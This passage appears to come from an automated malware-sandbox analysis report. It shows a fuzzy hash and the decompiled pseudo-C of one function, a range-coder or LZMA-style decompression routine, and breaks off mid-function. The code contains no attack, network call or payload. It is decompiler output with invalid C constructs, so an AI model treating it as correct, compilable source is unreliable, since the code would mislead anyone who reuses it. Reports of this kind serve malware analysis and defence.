                      • Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00406355, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                      Download Yara Rule
                      C-Code - Quality: 98%
                      			E00406355() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
